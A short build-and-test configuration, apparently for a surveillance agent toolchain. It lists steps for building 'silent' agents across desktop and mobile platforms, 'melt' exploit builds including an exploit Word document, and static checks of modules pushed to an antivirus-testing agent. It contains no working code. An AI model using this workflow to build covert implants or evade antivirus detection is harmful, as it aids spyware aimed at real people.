

# -------------- BUILD -------------- #
# Requires: START_AGENT

BUILD_ELITE:
    - BUILD: [ pull, windows_elite, silent ]

BUILD_WINDOWS:
    - CALL: CHECK_STATIC_MODULES
    - BUILD: [ pull, windows, silent ]

CHECK_STATIC_MODULES:
    - PUSH: [ AVAgent/assets/check/* ]
    - CHECK_STATIC: [ assets/check/codec, assets/check/codec_mod, assets/check/mac_core, assets/check/mac_osax, assets/check/sqlite, assets/check/sqlite_mod ]
    - CHECK_STATIC: [ assets/windows/* ]

BUILD_DESKTOP:
    - CALL: CHECK_STATIC_MODULES
    - ON_ERROR: CONTINUE
    - BUILD: [ pull, windows, silent ]
    - BUILD: [ pull, osx, silent ]
    - BUILD: [ pull, linux, silent ]
    - ON_ERROR: SKIP

BUILD_MOBILE:
    - ON_ERROR: CONTINUE
    - BUILD: [ pull, blackberry, silent ]
    - BUILD: [ pull, android, silent ]
    - BUILD: [ pull, ios, silent ]
    - BUILD: [ pull, winphone, silent ]
    - ON_ERROR: SKIP

BUILD_EXPLOIT:
    - BUILD: [ pull, exploit, melt ]
    - BUILD: [ pull, exploit_docx, melt ]